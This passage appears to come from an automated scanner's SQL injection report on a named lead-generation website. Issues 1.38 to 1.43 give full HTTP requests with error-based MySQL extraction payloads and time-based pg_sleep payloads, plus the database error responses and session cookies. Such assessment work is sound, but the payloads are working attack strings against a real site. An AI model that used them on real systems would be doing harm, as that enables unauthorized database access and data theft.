select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.38. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_435 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_435 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_435 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up'&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:34 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '$10,000 - 49,999&attributeId_437=2840__Yes&attributeId_438=2844__No - we do not ' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up''&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.39. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_435 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_435 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_435 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up'&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:22:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '$10,000 - 49,999&attributeId_437=2840__Yes&attributeId_438=2844__No - we do not ' at line 5

1.40. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_436 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_436 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_436 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999'&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:45 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'do not accept Visa or Mastercard&attributeId_529=3407__ $0 - $5,000&button3=Subm' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999''&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:45 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.41. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_436 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_436 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_436 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999'&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:23:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'do not accept Visa or Mastercard&attributeId_529=SELECT pg_sleep(25)--&button3=S' at line 5

1.42. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_437 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_437 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_437 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes'&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:23:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'do not accept Visa or Mastercard&attributeId_529=SELECT pg_sleep(25)--&button3=S' at line 5

1.43. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_437 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_437 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_437 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes'&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

